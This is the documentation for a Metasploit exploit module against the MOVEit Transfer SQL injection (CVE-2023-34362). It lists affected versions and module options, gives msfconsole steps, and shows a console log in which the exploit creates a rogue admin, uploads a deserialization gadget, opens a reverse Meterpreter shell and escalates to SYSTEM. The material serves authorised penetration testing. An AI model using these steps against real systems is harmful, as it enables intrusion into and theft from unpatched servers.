## Description
This module exploits an SQL injection vulnerability in the MOVEit Transfer web application
that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database. 
Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an
attacker can leverage an information leak be able to upload a .NET deserialization payload.

## Vulnerable Applications
MOVEit Transfer versions:

| Starting Version | Patched Version     |
|------------------|---------------------|
| 2023.0.0         | 2023.0.3 (15.0.3)   |
| 2022.1.x         | 2022.1.7 (14.1.7)   |
| 2022.0.x         | 2022.0.6 (14.0.6)   |
| 2021.1.x         | 2021.1.6 (13.1.6)   |
| 2021.0.x         | 2021.0.8 (13.0.8)   |
| 2020.1.x         | 2020.1.10 (12.1.10) |

# Installation Instructions
1. Installation requires a valid trial license that can be obtained by going here:
https://www.ipswitch.com/forms/free-trials/moveit-transfer
2. Ensure that your computer has intenet access for the license to activate and double-click the installer.
3. Follow installation instructions for an evaluation installation.
4. After the installation completes, follow the instructions to create an admin user.

## Options
**LOGIN_NAME**  (Required) Will be used as the login name for the system administrator created by the exploit.  The default is random.

**PASSWORD**    (Required) Will be used as the password name for the system administrator created by the exploit.  The default is random.

**USERNAME**    (Required) Will be used as the user name for the system administrator created by the exploit.  The default is random.

## Verification Steps
* Do: `msfconsole`
* Do: `use exploit/windows/http/moveit_cve_2023_34362`
* Do: `set rhost <rhost>`
* Do: `set lhost <lhost>`
* Do: `set fetch_srvhost <srvhost>`
* Do: `set lhost <lhost>`
* Do: `run`
* Do: **Verify** you get a session

## Scenarios
### Using MOVEit 15.0.0.3 on Windows Server 2022 21H2
```msf
msf6 exploit(windows/http/moveit_cve_2023_34362) > show options

Module options (exploit/windows/http/moveit_cve_2023_34362):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LOGIN_NAME  CGN3c8hSeaE      yes       Login Name
   PASSWORD    pnislnpdAWX      yes       Password
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      10.5.134.242     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
                                          tasploit.html
   RPORT       443              yes       The target port (TCP)
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
   TARGET_URI  /api/v1/token    no        Target URI
   USERNAME    wtxRmr5vw        yes       Username
   VHOST                        no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      lebHSskcwh       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       10.5.135.201     yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/moveit_cve_2023_34362) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] [0/10] Get the sessionID and siLockLongTermInstID
[*] [1/10] Create New Sysadmin
[*] [2/10] Get API Token
[*] [3/10] Get Folder ID
[*] [4/10] Begin File Upload
[*] [5/10] Leak Encryption Key
[*] [6/10] Generate Gadget
[*] [7/10] Encrypt Gadget
[*] [8/10] Upload Encrypted Gadget
[*] [9/10] Trigger Gadget
[*] [10/10] Cleaning Up
[*] Sending stage (200774 bytes) to 10.5.134.242
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.242:51176) at 2023-06-21 15:35:47 -0500

meterpreter > sysinfo
Computer        : WIN-ED9OLD6JEO6
OS              : Windows 2016+ (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 12
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-ED9OLD6JEO6\moveitsvc
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```
